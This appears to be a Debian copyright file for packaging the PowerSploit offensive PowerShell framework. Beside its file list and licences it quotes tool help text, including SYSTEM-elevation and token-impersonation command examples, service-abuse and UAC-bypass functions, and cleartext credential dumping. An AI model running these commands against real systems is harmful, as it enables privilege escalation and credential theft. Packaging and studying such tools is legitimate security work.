Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Upstream-Name: powersploit
Upstream-Contact: <preferred name and address to reach the upstream project>
Source: <url://example.com>
#
# Please double check copyright with the licensecheck(1) command.

Files:     .gitignore
           AntivirusBypass/AntivirusBypass.psd1
           AntivirusBypass/AntivirusBypass.psm1
           AntivirusBypass/Usage.md
           CodeExecution/CodeExecution.psd1
           CodeExecution/CodeExecution.psm1
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm
           CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm
           CodeExecution/Usage.md
           Exfiltration/Exfiltration.psd1
           Exfiltration/Exfiltration.psm1
           Exfiltration/Get-Keystrokes.ps1
           Exfiltration/LogonUser/LogonUser/LogonUser.sln
           Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp
           Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj
           Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters
           Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt
           Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp
           Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h
           Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h
           Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt
           Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp
           Exfiltration/LogonUser/LogonUser/logon/logon.cpp
           Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj
           Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters
           Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp
           Exfiltration/LogonUser/LogonUser/logon/stdafx.h
           Exfiltration/LogonUser/LogonUser/logon/targetver.h
           Exfiltration/NTFSParser/NTFSParser.sln
           Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj
           Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters
           Exfiltration/NTFSParser/NTFSParser/ReadMe.txt
           Exfiltration/NTFSParser/NTFSParser/stdafx.cpp
           Exfiltration/NTFSParser/NTFSParser/stdafx.h
           Exfiltration/NTFSParser/NTFSParser/targetver.h
           Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj
           Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters
           Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt
           Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp
           Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h
           Exfiltration/NTFSParser/NTFSParserDLL/targetver.h
           Exfiltration/Usage.md
           Exfiltration/VolumeShadowCopyTools.ps1
           Mayhem/Mayhem.psd1
           Mayhem/Usage.md
           Persistence/Persistence.psd1
           Persistence/Usage.md
           PowerSploit.psd1
           PowerSploit.psm1
           PowerSploit.pssproj
           PowerSploit.sln
           Privesc/Privesc.psd1
           Privesc/Privesc.psm1
           README.md
           Recon/Dictionaries/admin.txt
           Recon/Dictionaries/generic.txt
           Recon/Dictionaries/sharepoint.txt
           Recon/Invoke-CompareAttributesForClass.ps1
           Recon/README.md
           Recon/Recon.psd1
           Recon/Recon.psm1
           ScriptModification/ScriptModification.psd1
           ScriptModification/ScriptModification.psm1
           ScriptModification/Usage.md
           Tests/CodeExecution.tests.ps1
           Tests/Exfiltration.tests.ps1
           Tests/PowerSploit.tests.ps1
           Tests/Privesc.tests.ps1
           Tests/Recon.tests.ps1
           docs/Recon/Get-DomainTrust.md
           docs/Recon/Get-DomainTrustMapping.md
           docs/Recon/index.md
           docs/index.md
           mkdocs.yml
Copyright: __NO_COPYRIGHT_NOR_LICENSE__
License:   __NO_COPYRIGHT_NOR_LICENSE__

Files:     Exfiltration/NTFSParser/NTFSParser/NTFS.h
           Exfiltration/NTFSParser/NTFSParser/NTFS_Attribute.h
           Exfiltration/NTFSParser/NTFSParser/NTFS_Common.h
           Exfiltration/NTFSParser/NTFSParser/NTFS_DataType.h
           Exfiltration/NTFSParser/NTFSParser/NTFS_FileRecord.h
           Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h
           Exfiltration/NTFSParser/NTFSParserDLL/NTFS_Attribute.h
           Exfiltration/NTFSParser/NTFSParserDLL/NTFS_Common.h
           Exfiltration/NTFSParser/NTFSParserDLL/NTFS_DataType.h
           Exfiltration/NTFSParser/NTFSParserDLL/NTFS_FileRecord.h
Copyright: 2010 cyb70289 <cyb70289@gmail.com>
License:   GPL-2.0+
 This program/include file is free software; you can redistribute it and/or
 modify it under the terms of the GNU General Public License as published
 by the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 .
 This program/include file is distributed in the hope that it will be
 useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 .
 On Debian systems, the complete text of the GNU General Public License
 Version 2 can be found in `/usr/share/common-licenses/GPL-2'.

Files:     Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp
           Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp
Copyright: 2013 Joe Bialek Twitter:@JosephBialek
License:   GPL-2.0+
 This program/include file is free software; you can redistribute it and/or
 modify it under the terms of the GNU General Public License as published
 by the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 .
 This program/include file is distributed in the hope that it will be
 useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 .
 This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>
 .
 On Debian systems, the complete text of the GNU General Public License
 Version 2 can be found in `/usr/share/common-licenses/GPL-2'.

Files:     Privesc/README.md
           docs/Privesc/index.md
Copyright: __NO_COPYRIGHT__ in: Privesc/README.md
           __NO_COPYRIGHT__ in: docs/Privesc/index.md
License:   __UNKNOWN__
 ### Token/Privilege Enumeration/Abuse:
 Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not
 Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID
 Enable-Privilege                    -   enables a specific privilege for the current process
 .
 ### Service Enumeration/Abuse:
 Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set
 Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name
 Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config
 Get-ModifiableService               -   returns services the current user can modify
 Get-ServiceDetail                   -   returns detailed information about a specified service
 Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value
 Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command
 Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command
 Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command
 Restore-ServiceBinary               -   restores a replaced service binary with the original executable
 .
 ### DLL Hijacking:
 Find-ProcessDLLHijack               -   finds potential DLL hijacking opportunities for currently running processes
 Find-PathDLLHijack                  -   finds service %PATH% DLL hijacking opportunities
 Write-HijackDll                     -   writes out a hijackable DLL
 .
 ### Registry Checks:
 Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set
 Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry
 Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
 .
 ### Miscellaneous Checks:
 Get-ModifiableScheduledTaskFile     -   find schtasks with modifiable target files
 Get-UnattendedInstallFile           -   finds remaining unattended installation files
 Get-Webconfig                       -   checks for any encrypted web.config strings
 Get-ApplicationHost                 -   checks for encrypted application pool and virtual directory passwords
 Get-SiteListPassword                -   retrieves the plaintext passwords for any found McAfee's SiteList.xml files
 Get-CachedGPPPassword               -   checks for passwords in cached Group Policy Preferences files
 .
 ### Other Helpers/Meta-Functions:
 Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify
 Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added
 Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe
 Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)

Files:     Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp
Copyright: 2013 Joe Bialek Twitter:@JosephBialek
License:   GPL-2.0+
 This program/include file is free software; you can redistribute it and/or
 modify it under the terms of the GNU General Public License as published
 by the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 .
 This program/include file is distributed in the hope that it will be
 useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 .
 This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>
 .
 dllmain.cpp : Defines the entry point for the DLL application.
 .
 On Debian systems, the complete text of the GNU General Public License
 Version 2 can be found in `/usr/share/common-licenses/GPL-2'.

Files:     Recon/Invoke-Portscan.ps1
Copyright: __NO_COPYRIGHT__ in: Recon/Invoke-Portscan.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Does a simple port scan using regular sockets, based (pretty) loosely on nmap
 .
 .PARAMETER Hosts
 .
 Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in
 .
 .PARAMETER HostFile
 .
 Input hosts from file rather than commandline
 .
 .PARAMETER ExcludeHosts
 .
 Exclude these comma seperated hosts
 .
 .PARAMETER Ports
 .
 Include these comma seperated ports (can also be a range like 80-90)
 .
 .PARAMETER PortFile
 .
 Input ports from a file
 .
 .PARAMETER TopPorts
 .
 Include the x top ports - only goes to 1000, default is top 50
 .
 .PARAMETER ExcludedPorts
 .
 Exclude these comma seperated ports
 .
 .PARAMETER SkipDiscovery
 .
 Treat all hosts as online, skip host discovery
 .
 .PARAMETER PingOnly
 .
 Ping scan only (disable port scan)
 .
 .PARAMETER DiscoveryPorts
 .
 Comma separated ports used for host discovery. -1 is a ping
 .
 .PARAMETER Threads
 .
 number of max threads for the thread pool (per host)
 .
 .PARAMETER nHosts
 .
 number of hosts to concurrently scan
 .
 .PARAMETER Timeout
 .
 Timeout time on a connection in miliseconds before port is declared filtered
 .
 .PARAMETER SleepTimer
 .
 Wait before thread checking, in miliseconds
 .
 .PARAMETER SyncFreq
 .
 How often (in terms of hosts) to sync threads and flush output
 .
 .PARAMETER T
 .
 [0-5] shortcut performance options. Default is 3. higher is more aggressive. Sets (nhosts, threads,timeout)

Files:     Exfiltration/Get-VaultCredential.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Get-VaultCredential.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Get-VaultCredential enumerates and displays all credentials stored in the Windows
 vault. Web credentials, specifically are displayed in cleartext. This script was
 inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt
 .
 .EXAMPLE
 .
 Get-VaultCredential
 .
 .NOTES
 .
 Only web credentials can be displayed in cleartext.
 #>
 [CmdletBinding()] Param()

Files:     Exfiltration/Invoke-TokenManipulation.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Invoke-TokenManipulation.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.
 .
 .PARAMETER Enumerate
 .
 Switch. Specifics to enumerate logon tokens available. By default this will only list unqiue usable tokens (not network-logon tokens).
 .
 .PARAMETER RevToSelf
 .
 Switch. Stops impersonating an alternate users Token.
 .
 .PARAMETER ShowAll
 .
 Switch. Enumerate all Logon Tokens (including non-unique tokens and NetworkLogon tokens).
 .
 .PARAMETER ImpersonateUser
 .
 Switch. Will impersonate an alternate users logon token in the PowerShell thread. Can specify the token to use by Username, ProcessId, or ThreadId.
 This mode is not recommended because PowerShell is heavily threaded and many actions won't be done in the current thread. Use CreateProcess instead.
 .
 .PARAMETER CreateProcess
 .
 Specify a process to create with an alternate users logon token. Can specify the token to use by Username, ProcessId, or ThreadId.
 .
 .PARAMETER WhoAmI
 .
 Switch. Displays the credentials the PowerShell thread is running under.
 .
 .PARAMETER Username
 .
 Specify the Token to use by username. This will choose a non-NetworkLogon token belonging to the user.
 .
 .PARAMETER ProcessId
 .
 Specify the Token to use by ProcessId. This will use the primary token of the process specified.
 .
 .PARAMETER Process
 .
 Specify the token to use by process object (will use the processId under the covers). This will impersonate the primary token of the process.
 .
 .PARAMETER ThreadId
 .
 Specify the Token to use by ThreadId. This will use the token of the thread specified.
 .
 .PARAMETER ProcessArgs
 .
 Specify the arguments to start the specified process with when using the -CreateProcess mode.
 .
 .PARAMETER NoUI
 .
 If you are creating a process which doesn't need a UI to be rendered, use this flag. This will prevent the script from modifying the Desktop ACL's of the
 current user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control
 to "Everyone".
 .
 .PARAMETER PassThru
 .
 If you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline.
 .
 .EXAMPLE
 .
 Invoke-TokenManipulation -Enumerate
 .
 Lists all unique usable tokens on the computer.
 .
 .EXAMPLE
 .
 Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"
 .
 Spawns cmd.exe as SYSTEM.
 .
 .EXAMPLE
 .
 Invoke-TokenManipulation -ImpersonateUser -Username "nt authority\system"
 .
 Makes the current PowerShell thread impersonate SYSTEM.
 .
 .EXAMPLE
 .
 Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500
 .
 Spawns cmd.exe using the primary token belonging to process ID 500.
 .
 .EXAMPLE
 .
 Invoke-TokenManipulation -ShowAll
 .
 Lists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon.
 .
 .EXAMPLE
 .
 Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500
 .
 Spawns cmd.exe using the token belonging to thread ID 500.
 .
 .EXAMPLE
 .
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"
 .
 Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the "-Process" parameter of the script.
 .
 .EXAMPLE
 .
 (Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit()
 .
 Spawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited.
 .
 .EXAMPLE
 .
 Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser
 .
 Makes the current thread impersonate the lsass security token.
 .
 .NOTES
 This script was inspired by incognito.
 .
 Several of the functions used in this script were written by Matt Graeber(Twitter: @mattifestation, Blog: http://www.exploit-monday.com/).
 BIG THANKS to Matt Graeber for helping debug.
 .
 .LINK
 .
 Blog: http://clymb3r.wordpress.com/
 Github repo: https://github.com/clymb3r/PowerShell
 Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 .
 #>

Files:     docs/Recon/Set-DomainObjectOwner.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Set-DomainObjectOwner.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Set-DomainObjectOwner [-Identity] <String> -OwnerIdentity <String> [-Domain <String>] [-LDAPFilter <String>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Retrieves the Active Directory object specified by -Identity by splatting to
 Get-DomainObject, returning the raw searchresult object.
 Retrieves the raw
 directoryentry for the object, and sets the object owner to -OwnerIdentity.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
 ```
 .
 Set the owner of 'dfm' in the current domain to 'harmj0y'.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Privesc/Get-ModifiableScheduledTaskFile.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ModifiableScheduledTaskFile.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ModifiableScheduledTaskFile
 ```
 .
 ## DESCRIPTION
 Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
 and parses the XML specification for each task, extracting the command triggers.
 Each trigger string is filtered through Get-ModifiablePath, returning any file/config
 locations in the found path strings that the current user can modify.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ModifiableScheduledTaskFile
 ```
 .
 Return scheduled tasks with modifiable command strings.
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.ModifiableScheduledTaskFile
 .
 Custom PSObject containing results.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Privesc/Add-ServiceDacl.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Add-ServiceDacl.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Add-ServiceDacl [-Name] <String[]>
 ```
 .
 ## DESCRIPTION
 Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
 Dacl field to each object.
 It does this by opening a handle with ReadControl for the
 service with using the GetServiceHandle Win32 API call and then uses
 QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-Service | Add-ServiceDacl
 ```
 .
 Add Dacls for every service the current user can read.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-Service -Name VMTools | Add-ServiceDacl
 ```
 .
 Add the Dacl to the VMTools service object.
 .
 ## PARAMETERS
 .
 ### -Name
 An array of one or more service names to add a service Dacl for.
 Passable on the pipeline.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases: ServiceName
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### ServiceProcess.ServiceController
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)

Files:     ScriptModification/Out-CompressedDll.ps1
Copyright: __NO_COPYRIGHT__ in: ScriptModification/Out-CompressedDll.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
 .
 .PARAMETER FilePath
 .
 Specifies the path to a managed executable.
 .
 .EXAMPLE
 .
 Out-CompressedDll -FilePath evil.dll
 .
 Description

Files:     docs/Privesc/Get-System.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-System.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### NamedPipe (Default)
 ```
 Get-System [-Technique <String>] [-ServiceName <String>] [-PipeName <String>]
 ```
 .
 ### Token
 ```
 Get-System [-Technique <String>]
 ```
 .
 ### RevToSelf
 ```
 Get-System [-RevToSelf]
 ```
 .
 ### WhoAmI
 ```
 Get-System [-WhoAmI]
 ```
 .
 ## DESCRIPTION
 {{Fill in the Description}}
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-System
 ```
 .
 Uses named impersonate to elevate the current thread token to SYSTEM.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
 ```
 .
 Uses named impersonate to elevate the current thread token to SYSTEM
 with a custom service and pipe name.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-System -Technique Token
 ```
 .
 Uses token duplication to elevate the current thread token to SYSTEM.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```
 Get-System -WhoAmI
 ```
 .
 Displays the credentials for the current thread.
 .
 ### -------------------------- EXAMPLE 5 --------------------------
 ```
 Get-System -RevToSelf
 ```
 .
 Reverts the current thread privileges.
 .
 ## PARAMETERS
 .
 ### -Technique
 The technique to use, 'NamedPipe' or 'Token'.
 .
 ```yaml
 Type: String
 Parameter Sets: NamedPipe, Token
 Aliases:
 .
 Required: False
 Position: Named
 Default value: NamedPipe
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ServiceName
 The name of the service used with named pipe impersonation, defaults to 'TestSVC'.
 .
 ```yaml
 Type: String
 Parameter Sets: NamedPipe
 Aliases:
 .
 Required: False
 Position: Named
 Default value: TestSVC
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -PipeName
 The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.
 .
 ```yaml
 Type: String
 Parameter Sets: NamedPipe
 Aliases:
 .
 Required: False
 Position: Named
 Default value: TestSVC
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -RevToSelf
 Reverts the current thread privileges.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: RevToSelf
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -WhoAmI
 Switch.
 Display the credentials for the current PowerShell thread.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: WhoAmI
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
 https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
 http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
 http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
 https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
 http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
 http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/)

Files:     docs/Recon/Find-InterestingDomainShareFile.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-InterestingDomainShareFile.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### FileSpecification (Default)
 ```
 Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
 [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-Include <String[]>] [-SharePath <String[]>]
 [-ExcludedShares <String[]>] [-LastAccessTime <DateTime>] [-LastWriteTime <DateTime>]
 [-CreationTime <DateTime>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
 [-Threads <Int32>]
 ```
 .
 ### OfficeDocs
 ```
 Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
 [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
 [-ExcludedShares <String[]>] [-OfficeDocs] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ### FreshEXEs
 ```
 Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
 [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
 [-ExcludedShares <String[]>] [-FreshEXEs] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
 [-Threads <Int32>]
 ```
